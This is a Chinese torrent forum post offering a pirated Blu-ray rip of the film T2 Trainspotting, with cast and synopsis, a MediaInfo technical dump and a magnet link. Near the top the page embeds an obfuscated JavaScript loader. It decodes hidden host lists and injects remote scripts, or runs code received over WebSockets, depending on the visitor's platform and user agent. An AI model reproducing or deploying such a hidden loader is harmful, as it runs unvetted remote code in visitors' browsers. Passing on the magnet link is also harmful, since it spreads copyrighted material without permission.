猜火车2[双语字幕]T2.Trainspotting.2017.1080p.BluRay.x264.DTS-迅雷下载 12.34GB

版主小s 18天前 185

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 猜火车2 / Porno / T2:Trainspotting / Trainspotting 2 / 迷幻列车2(港)

◎片 名 T2 Trainspotting

◎年 代 2017

◎产 地 英国

◎类 别 剧情 / 犯罪

◎语 言 英语

◎上映日期 2017-01-27(英国)

◎IMDb评分 7.2/10 from 115653 users

◎IMDb链接 https://www.imdb.com/title/tt2763304

◎豆瓣评分 8.0/10 from 70862 users

◎豆瓣链接 https://movie.douban.com/subject/22263645/

◎片 长 117分钟

◎导 演 丹尼·博伊尔 Danny Boyle

◎编 剧 约翰·霍奇 John Hodge / 埃文·威尔什 Irvine Welsh

◎主 演 伊万·麦克格雷格 Ewan McGregor

约翰尼·李·米勒 Jonny Lee Miller

罗伯特·卡莱尔 Robert Carlyle

艾文·布莱纳 Ewen Bremner

雪莉·亨德森 Shirley Henderson

安杰拉·奈迪亚科娃 Anjela Nedyalkova

史蒂文·罗伯特森 Steven Robertson

戈登·肯尼迪 Gordon Kennedy

西蒙·韦尔 Simon Weir

詹姆斯·科兹莫 James Cosmo

梁佩诗 Katie Leung

阿塔·雅谷伯 Atta Yaqub

埃文·威尔什 Irvine Welsh

凯莉·麦克唐纳 Kelly Macdonald

艾琳·尼古拉斯 Eileen Nicholas

凯文·麦克基德 Kevin McKidd

艾米·曼森 Amy Manson

波林·林奇 Pauline Lynch

特丽莎·达斯科娃 Tereza Duskova

斯考特·格瑞南 Scot Greenan

约翰·贝尔 John Bell

伊莱亚·沃尔夫 Elijah Wolf

◎标 签 英国 | 犯罪 | 黑色幽默 | 青春 | 剧情 | 经典 | 2017 | 毒品

◎简 介

一晃眼二十年过去。远赴他乡的雷登(伊万·麦克格雷格 Ewan McGregor 饰)再度踏上了爱丁堡的故土。哪知道刚一回来,就撞上了走投无路陷入绝望之中的屎霸(艾文·布莱纳 Ewen Bremner 饰)试图自杀,原来,屎霸不仅婚姻失败还再度染上了毒瘾。在雷登的鼓励下,屎霸决定用书写来治愈内心的伤痕。之后,雷登找到了曾经的挚友病孩(约翰·李·米勒 Jonny Lee Miller 饰),病孩因为曾经的龃龉痛揍了雷登,之后,一个复仇的计划在他心中慢慢成型。在病孩的邀请下,雷登决定和病孩合伙开一家妓院,之后,擅长设计的屎霸亦加入了进来。那边厢,锒铛入狱的贝格比(罗伯特·卡莱尔 Robert Carlyle 饰)越狱成功,在了解了当年事件的真相后,他亦决定找到雷顿向他寻仇。

◎获奖情况

第4届豆瓣电影年度榜单(2017)

最受关注的非院线电影(提名)

评分最高的欧洲电影(提名)

6月最受关注电影(提名)

第3届豆瓣电影年度榜单(2016)

最值得期待的外语电影(提名)

  1. General

  2. Unique ID : 17312751220700919708172660874219440805 (0xD06508998E5907BA03688E0F7654AA5)

  3. Complete name : T2.Trainspotting.2017.1080p.BluRay.x264.DTS-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 12.3 GiB

  7. Duration : 1 h 57 min

  8. Overall bit rate : 15.0 Mb/s

  9. Movie name : T2: Trainspotting – Blu-ray?

  10. Encoded date : UTC 2021-07-07 11:43:02

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 57 min

  25. Bit rate : 13.4 Mb/s

  26. Width : 1 920 pixels

  27. Height : 1 036 pixels

  28. Display aspect ratio : 1.85:1

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.282

  36. Stream size : 11.0 GiB (89%)

  37. Writing library : x264 core 164 r3065+55M 280faca t_mod_New [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=19.5000 / qcomp=0.65 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.80 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Default : Yes

  40. Forced : No


  41. Audio

  42. ID : 2

  43. ID in the original source medium : 4352 (0x1100)

  44. Format : DTS

  45. Format/Info : Digital Theater Systems

  46. Codec ID : A_DTS

  47. Duration : 1 h 57 min

  48. Bit rate mode : Constant

  49. Bit rate : 1 509 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 16 bits

  55. Compression mode : Lossy

  56. Stream size : 1.24 GiB (10%)

  57. Language : English

  58. Default : Yes

  59. Forced : No

  60. Original source medium : Blu-ray


  61. Text #1

  62. ID : 3

  63. ID in the original source medium : 4622 (0x120E)

  64. Format : PGS

  65. Muxing mode : zlib

  66. Codec ID : S_HDMV/PGS

  67. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  68. Duration : 1 h 47 min

  69. Bit rate : 45.1 kb/s

  70. Count of elements : 2635

  71. Stream size : 34.8 MiB (0%)

  72. Title : chs&eng

  73. Language : Chinese

  74. Default : Yes

  75. Forced : No

  76. Original source medium : Blu-ray


  77. Text #2

  78. ID : 4

  79. ID in the original source medium : 4623 (0x120F)

  80. Format : PGS

  81. Muxing mode : zlib

  82. Codec ID : S_HDMV/PGS

  83. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  84. Duration : 1 h 47 min

  85. Bit rate : 45.5 kb/s

  86. Count of elements : 2635

  87. Stream size : 35.0 MiB (0%)

  88. Title : cht&eng

  89. Language : Chinese

  90. Default : No

  91. Forced : No

  92. Original source medium : Blu-ray


  93. Text #3

  94. ID : 5

  95. ID in the original source medium : 4624 (0x1210)

  96. Format : PGS

  97. Muxing mode : zlib

  98. Codec ID : S_HDMV/PGS

  99. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  100. Duration : 1 h 47 min

  101. Bit rate : 26.6 kb/s

  102. Count of elements : 2635

  103. Stream size : 20.5 MiB (0%)

  104. Title : chs

  105. Language : Chinese

  106. Default : No

  107. Forced : No

  108. Original source medium : Blu-ray


  109. Text #4

  110. ID : 6

  111. ID in the original source medium : 4625 (0x1211)

  112. Format : PGS

  113. Muxing mode : zlib

  114. Codec ID : S_HDMV/PGS

  115. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  116. Duration : 1 h 47 min

  117. Bit rate : 27.0 kb/s

  118. Count of elements : 2635

  119. Stream size : 20.8 MiB (0%)

  120. Title : cht

  121. Language : Chinese

  122. Default : No

  123. Forced : No

  124. Original source medium : Blu-ray


  125. Text #5

  126. ID : 7

  127. ID in the original source medium : 4608 (0x1200)

  128. Format : PGS

  129. Muxing mode : zlib

  130. Codec ID : S_HDMV/PGS

  131. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  132. Duration : 1 h 45 min

  133. Bit rate : 44.4 kb/s

  134. Count of elements : 2794

  135. Stream size : 33.7 MiB (0%)

  136. Title : eng

  137. Language : English

  138. Default : No

  139. Forced : No

  140. Original source medium : Blu-ray


  141. Menu

  142. 00:00:00.000 : Chapter 01

  143. 00:08:03.274 : Chapter 02

  144. 00:14:26.574 : Chapter 03

  145. 00:20:20.552 : Chapter 04

  146. 00:27:35.236 : Chapter 05

  147. 00:36:22.138 : Chapter 06

  148. 00:44:13.192 : Chapter 07

  149. 00:52:33.358 : Chapter 08

  150. 00:57:29.821 : Chapter 09

  151. 01:03:28.179 : Chapter 10

  152. 01:09:31.750 : Chapter 11

  153. 01:15:48.752 : Chapter 12

  154. 01:22:57.305 : Chapter 13

  155. 01:31:03.332 : Chapter 14

  156. 01:37:39.979 : Chapter 15

  157. 01:45:56.558 : Chapter 16


TAGS 剧情 犯罪

磁力链:
  • magnet:?xt=urn:btih:5CD990F867CBE2C4982608C30A57DC980098D56D
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回